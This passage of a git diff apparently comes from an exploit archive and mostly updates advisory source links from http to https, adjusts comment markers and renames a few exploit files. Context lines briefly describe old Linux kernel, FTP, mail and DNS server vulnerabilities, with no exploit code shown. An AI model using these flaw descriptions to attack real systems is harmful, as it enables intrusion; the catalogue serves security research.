fails to properly initialize certain memory before using using it in a user-accessible operation. diff --git a/exploits/linux/local/32820.txt b/exploits/linux/local/32820.txt index 865d79265..1b27353db 100644 --- a/exploits/linux/local/32820.txt +++ b/exploits/linux/local/32820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33922/info +source: https://www.securityfocus.com/bid/33922/info OpenSC is prone to an unauthorized-access vulnerability. diff --git a/exploits/linux/local/32829.c b/exploits/linux/local/32829.c index dab604886..f82189e79 100644 --- a/exploits/linux/local/32829.c +++ b/exploits/linux/local/32829.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33948/info +source: https://www.securityfocus.com/bid/33948/info The Linux kernel is prone to a local security-bypass vulnerability. diff --git a/exploits/linux/local/32848.txt b/exploits/linux/local/32848.txt index 3bde077a1..ca59cea4f 100644 --- a/exploits/linux/local/32848.txt +++ b/exploits/linux/local/32848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34080/info +source: https://www.securityfocus.com/bid/34080/info Sun xVM VirtualBox is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/32947.txt b/exploits/linux/local/32947.txt index 630448d15..c72321fec 100644 --- a/exploits/linux/local/32947.txt +++ b/exploits/linux/local/32947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34676/info +source: https://www.securityfocus.com/bid/34676/info DirectAdmin creates temporary files in an insecure manner. diff --git a/exploits/linux/local/33145.c b/exploits/linux/local/33145.c index 6d03fd2f2..097436aaa 100644 --- a/exploits/linux/local/33145.c +++ b/exploits/linux/local/33145.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35924/info +// source: https://www.securityfocus.com/bid/35924/info PHP Fuzzer Framework creates temporary files in an insecure manner. diff --git a/exploits/linux/local/33255.txt b/exploits/linux/local/33255.txt index f047f54fe..8af143eee 100644 --- a/exploits/linux/local/33255.txt +++ b/exploits/linux/local/33255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36523/info +source: https://www.securityfocus.com/bid/36523/info Xen is prone to a local authentication-bypass vulnerability. diff --git a/exploits/linux/local/33321.c b/exploits/linux/local/33321.c index 7f8af8772..353c00c2e 100644 --- a/exploits/linux/local/33321.c +++ b/exploits/linux/local/33321.c @@ -1,7 +1,7 @@ /* EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/33322/ -source: http://www.securityfocus.com/bid/36901/info +source: https://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. diff --git a/exploits/linux/local/33322.c b/exploits/linux/local/33322.c index 8a37702a8..9dd7484e5 100644 --- a/exploits/linux/local/33322.c +++ b/exploits/linux/local/33322.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/36901/info +source: https://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. diff --git a/exploits/linux/local/33395.txt b/exploits/linux/local/33395.txt index 13c8c27ce..c26adc0e9 100644 --- a/exploits/linux/local/33395.txt +++ b/exploits/linux/local/33395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37277/info +source: https://www.securityfocus.com/bid/37277/info Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions. diff --git a/exploits/linux/local/33508.txt b/exploits/linux/local/33508.txt index 92c115058..fbc4c1374 100644 --- a/exploits/linux/local/33508.txt +++ b/exploits/linux/local/33508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37776/info +source: https://www.securityfocus.com/bid/37776/info GNU Bash is prone to a command-injection vulnerability because it fails to adequately sanitize control characters in the 'ls' command. diff --git a/exploits/linux/local/33523.c b/exploits/linux/local/33523.c index cebbc020c..84b22c7d4 100644 --- a/exploits/linux/local/33523.c +++ b/exploits/linux/local/33523.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/37806/info +source: https://www.securityfocus.com/bid/37806/info Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/33576.txt b/exploits/linux/local/33576.txt index 278344003..0c6e8450f 100644 --- a/exploits/linux/local/33576.txt +++ b/exploits/linux/local/33576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37996/info +source: https://www.securityfocus.com/bid/37996/info Battery Life Toolkit (BLTK) is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/33604.sh b/exploits/linux/local/33604.sh index 42c0bf8b3..252299c54 100755 --- a/exploits/linux/local/33604.sh +++ b/exploits/linux/local/33604.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38120/info +source: https://www.securityfocus.com/bid/38120/info SystemTap is prone to multiple local memory-corruption vulnerabilities. diff --git a/exploits/linux/local/33623.txt b/exploits/linux/local/33623.txt index 3207b7492..c64d01beb 100644 --- a/exploits/linux/local/33623.txt +++ b/exploits/linux/local/33623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38176/info +source: https://www.securityfocus.com/bid/38176/info Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: diff --git a/exploits/linux/local/33963.txt b/exploits/linux/local/33963.txt index 94187107e..af90e9a0d 100644 --- a/exploits/linux/local/33963.txt +++ b/exploits/linux/local/33963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40005/info +source: https://www.securityfocus.com/bid/40005/info gdomap is prone to multiple local information-disclosure vulnerabilities. diff --git a/exploits/linux/local/34001.c b/exploits/linux/local/34001.c index dda633549..d0b4f820f 100644 --- a/exploits/linux/local/34001.c +++ b/exploits/linux/local/34001.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/40241/info +source: https://www.securityfocus.com/bid/40241/info The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation. diff --git a/exploits/linux/local/34267.sh b/exploits/linux/local/34267.sh index b740300d6..157af53dc 100755 --- a/exploits/linux/local/34267.sh +++ b/exploits/linux/local/34267.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41449/info +source: https://www.securityfocus.com/bid/41449/info Altair Engineering PBS Pro creates temporary files in an insecure manner. diff --git a/exploits/linux/local/34537.txt b/exploits/linux/local/34537.txt index 3fa321528..1be504b35 100644 --- a/exploits/linux/local/34537.txt +++ b/exploits/linux/local/34537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42779/info +source: https://www.securityfocus.com/bid/42779/info EncFS is prone to design errors in its cryptographic implementation. diff --git a/exploits/linux/local/34987.c b/exploits/linux/local/34987.c index bc3d9dd61..ef624496e 100644 --- a/exploits/linux/local/34987.c +++ b/exploits/linux/local/34987.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/44758/info +source: https://www.securityfocus.com/bid/44758/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/35681.txt b/exploits/linux/local/35681.txt index 40a68c7c8..e06929433 100644 --- a/exploits/linux/local/35681.txt +++ b/exploits/linux/local/35681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47652/info +source: https://www.securityfocus.com/bid/47652/info OProfile is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/36257.txt b/exploits/linux/local/36257.txt index e679c5cc4..d51bc1238 100644 --- a/exploits/linux/local/36257.txt +++ b/exploits/linux/local/36257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50380/info +source: https://www.securityfocus.com/bid/50380/info Trendmicro IWSS is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/36294.c b/exploits/linux/local/36294.c index eca952d20..cde338425 100644 --- a/exploits/linux/local/36294.c +++ b/exploits/linux/local/36294.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/50573/info +source: https://www.securityfocus.com/bid/50573/info The Linux kernel is prone to a local information-disclosure weakness. diff --git a/exploits/linux/local/36430.sh b/exploits/linux/local/36430.sh index 3f4699d60..631139975 100755 --- a/exploits/linux/local/36430.sh +++ b/exploits/linux/local/36430.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50982/info +source: https://www.securityfocus.com/bid/50982/info HP Application Lifestyle Management is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/36571.sh b/exploits/linux/local/36571.sh index 3729f2c49..47b794319 100755 --- a/exploits/linux/local/36571.sh +++ b/exploits/linux/local/36571.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/51529/info +#source: https://www.securityfocus.com/bid/51529/info #OverlayFS is prone to a local security-bypass vulnerability. diff --git a/exploits/linux/local/36887.py b/exploits/linux/local/36887.py index 9a4ab281a..4113707b3 100755 --- a/exploits/linux/local/36887.py +++ b/exploits/linux/local/36887.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52206/info +source: https://www.securityfocus.com/bid/52206/info GNOME NetworkManager is prone to a local arbitrary file-access vulnerability. diff --git a/exploits/linux/local/36966.txt b/exploits/linux/local/36966.txt index 71b812855..91aaac713 100644 --- a/exploits/linux/local/36966.txt +++ b/exploits/linux/local/36966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52452/info +source: https://www.securityfocus.com/bid/52452/info Light Display Manager (LightDM) is prone to a local arbitrary-file-deletion vulnerability. diff --git a/exploits/linux/local/37183.c b/exploits/linux/local/37183.c index bc9513494..5d38996dd 100644 --- a/exploits/linux/local/37183.c +++ b/exploits/linux/local/37183.c @@ -1,3 +1,4 @@ +/* # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 @@ -9,6 +10,7 @@ # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c +*/ /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== diff --git a/exploits/linux/local/37543.c b/exploits/linux/local/37543.c index 474809497..d4d722cbe 100644 --- a/exploits/linux/local/37543.c +++ b/exploits/linux/local/37543.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/54702/info +source: https://www.securityfocus.com/bid/54702/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/37631.c b/exploits/linux/local/37631.c index bb9e245b3..15605fa58 100644 --- a/exploits/linux/local/37631.c +++ b/exploits/linux/local/37631.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54982/info +// source: https://www.securityfocus.com/bid/54982/info GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/local/37898.py b/exploits/linux/local/37898.py index 62f26f8d6..56d55ad85 100755 --- a/exploits/linux/local/37898.py +++ b/exploits/linux/local/37898.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55725/info +source: https://www.securityfocus.com/bid/55725/info Reaver Pro is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/37937.c b/exploits/linux/local/37937.c index 3c4690fd6..6e7ae732c 100644 --- a/exploits/linux/local/37937.c +++ b/exploits/linux/local/37937.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/55855/info +source: https://www.securityfocus.com/bid/55855/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/38232.txt b/exploits/linux/local/38232.txt index 1df4887fc..81f219670 100644 --- a/exploits/linux/local/38232.txt +++ b/exploits/linux/local/38232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57492/info +source: https://www.securityfocus.com/bid/57492/info GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input. diff --git a/exploits/linux/local/38298.txt b/exploits/linux/local/38298.txt index 38b3c4149..400e1c59e 100644 --- a/exploits/linux/local/38298.txt +++ b/exploits/linux/local/38298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57784/info +source: https://www.securityfocus.com/bid/57784/info xNBD is prone to a vulnerability because it handles temporary files in an insecure manner. diff --git a/exploits/linux/local/38357.c b/exploits/linux/local/38357.c index d588c8e61..5dba49970 100644 --- a/exploits/linux/local/38357.c +++ b/exploits/linux/local/38357.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58292/info +// source: https://www.securityfocus.com/bid/58292/info rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability diff --git a/exploits/linux/local/38390.c b/exploits/linux/local/38390.c index 16cc62fb2..d24717fcd 100644 --- a/exploits/linux/local/38390.c +++ b/exploits/linux/local/38390.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/58478/info +source: https://www.securityfocus.com/bid/58478/info Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/38559.txt b/exploits/linux/local/38559.txt index eb9956cae..97d9d8dd4 100644 --- a/exploits/linux/local/38559.txt +++ b/exploits/linux/local/38559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60410/info +source: https://www.securityfocus.com/bid/60410/info Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/38817.txt b/exploits/linux/local/38817.txt index e63b2324d..0fdf422cb 100644 --- a/exploits/linux/local/38817.txt +++ b/exploits/linux/local/38817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63374/info +source: https://www.securityfocus.com/bid/63374/info Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/linux/local/38937.txt b/exploits/linux/local/38937.txt index 4ce58e9d1..3d1e4a359 100644 --- a/exploits/linux/local/38937.txt +++ b/exploits/linux/local/38937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64617/info +source: https://www.securityfocus.com/bid/64617/info Apache Libcloud is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/39207.txt b/exploits/linux/local/39207.txt index 73f2baa30..e41c42f8d 100644 --- a/exploits/linux/local/39207.txt +++ b/exploits/linux/local/39207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67727/info +source: https://www.securityfocus.com/bid/67727/info dpkg is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/local/39214.c b/exploits/linux/local/39214.c index 62981d568..98d5fa7c1 100644 --- a/exploits/linux/local/39214.c +++ b/exploits/linux/local/39214.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/68048/info +source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/41171.txt b/exploits/linux/local/41171.txt index e97805399..bb5e1f77c 100644 --- a/exploits/linux/local/41171.txt +++ b/exploits/linux/local/41171.txt @@ -1,4 +1,5 @@ -Source: http://www.openwall.com/lists/oss-security/2017/01/24/4 +/* +source: http://www.openwall.com/lists/oss-security/2017/01/24/4 This is a heads up for a trivial systemd local root exploit, that was silently fixed in the upstream git as: @@ -46,7 +47,7 @@ to spot potential issues. The systemd git log is really huge, with lots of commits each week ("new services as a service"). Sebastian - +*/ diff --git a/exploits/linux/local/438.c b/exploits/linux/local/438.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/local/438.c rename to exploits/linux/local/438.sh diff --git a/exploits/linux/local/469.c b/exploits/linux/local/469.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/local/469.c rename to exploits/linux/local/469.sh diff --git a/exploits/linux/local/75.c b/exploits/linux/local/75.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/local/75.c rename to exploits/linux/local/75.sh diff --git a/exploits/linux/local/9208.txt b/exploits/linux/local/9208.txt index 4f905e8ec..488c17f35 100644 --- a/exploits/linux/local/9208.txt +++ b/exploits/linux/local/9208.txt @@ -1,5 +1,5 @@ PulseAudio setuid Local Privilege Escalation Vulnerability -http://www.securityfocus.com/bid/35721 +https://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- diff --git a/exploits/linux/local/9595.c b/exploits/linux/local/9595.c index 39d1905bc..17286fc19 100644 --- a/exploits/linux/local/9595.c +++ b/exploits/linux/local/9595.c @@ -1,7 +1,7 @@ /* HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) -Reference: http://www.securityfocus.com/bid/35727 +Reference: https://www.securityfocus.com/bid/35727 Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) Credit: ANTHRAX666 for finding the vulnerability diff --git a/exploits/linux/remote/1232.c b/exploits/linux/remote/1232.c index f8a7afcd6..556658a8b 100644 --- a/exploits/linux/remote/1232.c +++ b/exploits/linux/remote/1232.c @@ -1,4 +1,4 @@ - /* +/* ***************************************************************************************************************** $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit ***************************************************************************************************************** diff --git a/exploits/linux/remote/1717.c b/exploits/linux/remote/1717.c index 0125b7c94..eee68f169 100644 --- a/exploits/linux/remote/1717.c +++ b/exploits/linux/remote/1717.c @@ -4,7 +4,7 @@ author : c0d3r "kaveh razavi" c0d3r@ihsteam.com package : fenice-1.10.tar.gz and prolly prior versions workaround : update after patch release - advisory : http://www.securityfocus.com/bid/17678 + advisory : https://www.securityfocus.com/bid/17678 company address : http://streaming.polito.it/server timeline : 23 Apr 2006 : vulnerability reported by Luigi Auriemma diff --git a/exploits/linux/remote/18761.rb b/exploits/linux/remote/18761.rb index a644fddb4..bd7ff3882 100755 --- a/exploits/linux/remote/18761.rb +++ b/exploits/linux/remote/18761.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote ['CVE', '2008-5499'], ['OSVDB', '50796'], ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], - ['URL', 'http://www.securityfocus.com/bid/32896/exploit'] + ['URL', 'https://www.securityfocus.com/bid/32896/exploit'] ], 'DefaultOptions' => { diff --git a/exploits/linux/remote/19069.txt b/exploits/linux/remote/19069.txt index c8e8ddf95..e9136a853 100644 --- a/exploits/linux/remote/19069.txt +++ b/exploits/linux/remote/19069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/75/info +source: https://www.securityfocus.com/bid/75/info There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it. diff --git a/exploits/linux/remote/19079.c b/exploits/linux/remote/19079.c index fec0b0a65..55f7dc792 100644 --- a/exploits/linux/remote/19079.c +++ b/exploits/linux/remote/19079.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/90/info +// source: https://www.securityfocus.com/bid/90/info The Quake server has a feature where it allows administrators to remotely send commands to the Quake console with a password. However, it is possible to remotely bypass authentication. diff --git a/exploits/linux/remote/19086.c b/exploits/linux/remote/19086.c index 165f31178..561140ced 100644 --- a/exploits/linux/remote/19086.c +++ b/exploits/linux/remote/19086.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/113/info +source: https://www.securityfocus.com/bid/113/info There is a vulnerability in ProFTPD versions 1.2.0pre1 and earlier and in wu-ftpd 2.4.2 (beta 18) VR9 and earlier. This vulnerability is a buffer overflow triggered by unusually long path names (directory structures). For example, if a user has write privilages he or she may create an unusually long pathname which due to insuficient bounds checking in ProFTPD will overwrite the stack. This will allow the attacker to insert their own instruction set on the stack to be excuted thereby elavating their access. diff --git a/exploits/linux/remote/19087.c b/exploits/linux/remote/19087.c index c2fb5d814..19977c3a4 100644 --- a/exploits/linux/remote/19087.c +++ b/exploits/linux/remote/19087.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/113/info +source: https://www.securityfocus.com/bid/113/info There is a vulnerability in ProFTPD versions 1.2.0pre1 and earlier and in wu-ftpd 2.4.2 (beta 18) VR9 and earlier. This vulnerability is a buffer overflow triggered by unusually long path names (directory structures). For example, if a user has write privilages he or she may create an unusually long pathname which due to insuficient bounds checking in ProFTPD will overwrite the stack. This will allow the attacker to insert their own instruction set on the stack to be excuted thereby elavating their access. diff --git a/exploits/linux/remote/19096.c b/exploits/linux/remote/19096.c index 7df78d15f..ba9dafad5 100644 --- a/exploits/linux/remote/19096.c +++ b/exploits/linux/remote/19096.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/121/info +// source: https://www.securityfocus.com/bid/121/info NFS servers running certain implementations of mountd, primarily Linux systems. On some systems, the vulnerable NFS server is enabled by default. This vulnerability can be exploited even if the NFS server does not share any file systems. diff --git a/exploits/linux/remote/19104.c b/exploits/linux/remote/19104.c index e14a3194b..3d4b78211 100644 --- a/exploits/linux/remote/19104.c +++ b/exploits/linux/remote/19104.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/127/info +source: https://www.securityfocus.com/bid/127/info Statd is the RPC NFS status daemon. It is used to communicate status information to other services or host. diff --git a/exploits/linux/remote/19105.c b/exploits/linux/remote/19105.c index be88e1d41..258a9a9d1 100644 --- a/exploits/linux/remote/19105.c +++ b/exploits/linux/remote/19105.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/128/info +// source: https://www.securityfocus.com/bid/128/info Wwwcount (count.cgi) is a very popular CGI program used to track website usage. In particular, it enumerates the number of hits on given webpages and increments them on a 'counter'. In October of 1997 two remotely exploitable problems were discovered with this program. The first problem was somewhat innocuous in that it only allowed remote users to view .GIF files they were not supposed to have access to. This may be dangerous if the site contains sensitive data in .GIF files such as demographic/financial data in charts etc. diff --git a/exploits/linux/remote/19107.c b/exploits/linux/remote/19107.c index 7be516051..c11ac1d45 100644 --- a/exploits/linux/remote/19107.c +++ b/exploits/linux/remote/19107.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/130/info +// source: https://www.securityfocus.com/bid/130/info A vulnerability exists in certain imapd implementations that allow an attacker to execute arbitrary code remotely. In certain instances, the code to be executed will be run with root privilege. diff --git a/exploits/linux/remote/19109.c b/exploits/linux/remote/19109.c index e058e10bb..ce9d859cb 100644 --- a/exploits/linux/remote/19109.c +++ b/exploits/linux/remote/19109.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/133/info +// source: https://www.securityfocus.com/bid/133/info A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version. diff --git a/exploits/linux/remote/19111.c b/exploits/linux/remote/19111.c index 97f5fc39d..ff73d7ae4 100644 --- a/exploits/linux/remote/19111.c +++ b/exploits/linux/remote/19111.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/134/info +source: https://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host. diff --git a/exploits/linux/remote/19112.c b/exploits/linux/remote/19112.c index 69873a6c0..1f1906100 100644 --- a/exploits/linux/remote/19112.c +++ b/exploits/linux/remote/19112.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/134/info +source: https://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host. diff --git a/exploits/linux/remote/19119.c b/exploits/linux/remote/19119.c index 49931caab..eb51e5775 100644 --- a/exploits/linux/remote/19119.c +++ b/exploits/linux/remote/19119.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/150/info +source: https://www.securityfocus.com/bid/150/info A number of vulnerabilities exist in Hewlett Packard's rlpdaemon under HPUX 9.x and 10.x. These vulnerabilities may allow for a remote attacker to access the system under the lp user account, as well as execute arbitrary commands remotely, also as user lp. diff --git a/exploits/linux/remote/19123.c b/exploits/linux/remote/19123.c index 19c8b19d1..a0fac16f6 100644 --- a/exploits/linux/remote/19123.c +++ b/exploits/linux/remote/19123.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/156/info +// source: https://www.securityfocus.com/bid/156/info A buffer overflow exists in the pop server shipped with Santa Cruz Operation, Inc's (SCO) Open Server. By presenting a buffer of sufficient length to the pop server, an attacker can overwrite the return address on the stack, and execute arbitrary code upon a return. SCO's pop server is based on Qualcomm's pop daemon, and this vulnerability is similar to others present in Qualcomm's server. diff --git a/exploits/linux/remote/19124.txt b/exploits/linux/remote/19124.txt index 1d4cc87d9..bd47dc5d1 100644 --- a/exploits/linux/remote/19124.txt +++ b/exploits/linux/remote/19124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/157/info +source: https://www.securityfocus.com/bid/157/info A vulnerability exists in HP's JetAdmin Rev. D.01.09 software. Due to its failure to check if it is following a symbolic link, it is possible for an attacker to create a link from /tmp/jetadmin.log to anywhere on the filesystem, with permissions for reading and writing by everyone on the system. This can be used to gain root access. diff --git a/exploits/linux/remote/19218.c b/exploits/linux/remote/19218.c index e5cb70f42..ad5c8f365 100644 --- a/exploits/linux/remote/19218.c +++ b/exploits/linux/remote/19218.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/269/info +// source: https://www.securityfocus.com/bid/269/info The Serv-U FTP server versions 2.5 and earlier are vulnerable to multiple buffer overflows. This can result in a denial of service and at worst in arbitrary code being executed on the system. diff --git a/exploits/linux/remote/19219.c b/exploits/linux/remote/19219.c index 314aa25b5..e9c9987ee 100644 --- a/exploits/linux/remote/19219.c +++ b/exploits/linux/remote/19219.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/271/info +// source: https://www.securityfocus.com/bid/271/info Multiple vulnerabilities in the BisonWare FTP Server can cause denials of service. diff --git a/exploits/linux/remote/19226.c b/exploits/linux/remote/19226.c index 6aee495e8..5d92bffaf 100644 --- a/exploits/linux/remote/19226.c +++ b/exploits/linux/remote/19226.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/283/info +// source: https://www.securityfocus.com/bid/283/info A buffer overflow vulnerability in pop2d version 4.4 or earlier allow malicious remote users to obtain access to the "nobody" user account. diff --git a/exploits/linux/remote/19247.c b/exploits/linux/remote/19247.c index 5a4b94130..9adaa1de2 100644 --- a/exploits/linux/remote/19247.c +++ b/exploits/linux/remote/19247.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +// source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/linux/remote/19251.c b/exploits/linux/remote/19251.c index c41a31482..c8d0fa550 100644 --- a/exploits/linux/remote/19251.c +++ b/exploits/linux/remote/19251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/313/info +// source: https://www.securityfocus.com/bid/313/info A vulnerability in tcpdump causes it to enter an infinite loop within the procedure ip_print() from the file print_ip.c when it receives a packet with IP protocol number four and a zero header length and it tries to print it. This may allow remote malicious users to evade network monitoring. diff --git a/exploits/linux/remote/19253.txt b/exploits/linux/remote/19253.txt index b5d5bf1ce..c647de93c 100644 --- a/exploits/linux/remote/19253.txt +++ b/exploits/linux/remote/19253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/318/info +source: https://www.securityfocus.com/bid/318/info The Debian GNU/Linux 2.1 apache package by default allows anyone to view /usr/doc via the web, remotely. This is because srm.conf is preconfigured with the line: diff --git a/exploits/linux/remote/19297.c b/exploits/linux/remote/19297.c index ad697dcbc..a193c2d3e 100644 --- a/exploits/linux/remote/19297.c +++ b/exploits/linux/remote/19297.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/371/info +source: https://www.securityfocus.com/bid/371/info There is a vulnerability in the System Data Repository (SDR) subsystem. The SDR subsystem is used in IBM SP multi-machine parallel processing environments typically associated with Super Computing. The SDR is deisgned to allow multiple machines to share configuration and operational information. However, proper authentication is not in place in the SDR daemon 'sdrd', this allows un-authenticated users to arbitrarily pull any file off SDR hosts. */ diff --git a/exploits/linux/remote/19458.c b/exploits/linux/remote/19458.c index 53baac26b..6fda28368 100644 --- a/exploits/linux/remote/19458.c +++ b/exploits/linux/remote/19458.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/580/info +source: https://www.securityfocus.com/bid/580/info Certain Linux kernels in the 2.0.3x range are susceptible to blind TCP spoofing attacks due to the way that the kernel handles invalid ack sequence numbers, and the way it assigns IDs to outgoing IP datagrams. For this vulnerability to be effective, 3 conditions have to be met: The spoofed machine must be off the network or incapable of sending data out/recieving data properly, the target machine must not be communicating actively with any other machines at the time, and no packets between the attacker's machine and the target can be dropped during the attack. diff --git a/exploits/linux/remote/19475.c b/exploits/linux/remote/19475.c index 30ef7e3f1..7ba8b0cdd 100644 --- a/exploits/linux/remote/19475.c +++ b/exploits/linux/remote/19475.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/612/info +// source: https://www.securityfocus.com/bid/612/info The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c. The vulnerability in 1.2pre4 is a mkdir overflow. The name of the created path can not exceed 255 chars. diff --git a/exploits/linux/remote/19476.c b/exploits/linux/remote/19476.c index 0efb7fe3f..dd2e81293 100644 --- a/exploits/linux/remote/19476.c +++ b/exploits/linux/remote/19476.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/612/info +// source: https://www.securityfocus.com/bid/612/info The vulnerability in 